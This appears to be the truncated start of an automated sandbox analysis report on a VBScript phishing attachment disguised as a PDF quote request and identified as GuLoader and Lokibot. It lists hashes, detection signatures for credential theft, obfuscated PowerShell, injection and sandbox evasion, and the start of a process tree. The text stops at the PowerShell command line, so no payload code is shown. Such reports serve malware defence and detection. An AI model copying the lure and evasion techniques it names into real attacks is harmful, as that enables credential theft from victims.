Windows
Analysis Report
Request for Proposal Quote_2414976#U00b7pdf.vbs
Overview
General Information
Sample name: | Request for Proposal Quote_2414976#U00b7pdf.vbs (renamed because original name is a hash value) |
Original sample name: | Request for Proposal Quote_2414976pdf.vbs |
Analysis ID: | 1428348 |
MD5: | 4c0d5b830080aa8b72546a6d7f924aca |
SHA1: | d061aa6f577e894eb58fd4bc64b366e2e7919630 |
SHA256: | 56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0 |
Tags: | vbs |
Infos: | |
Detection
GuLoader, Lokibot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 4320 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 6784 cmdline: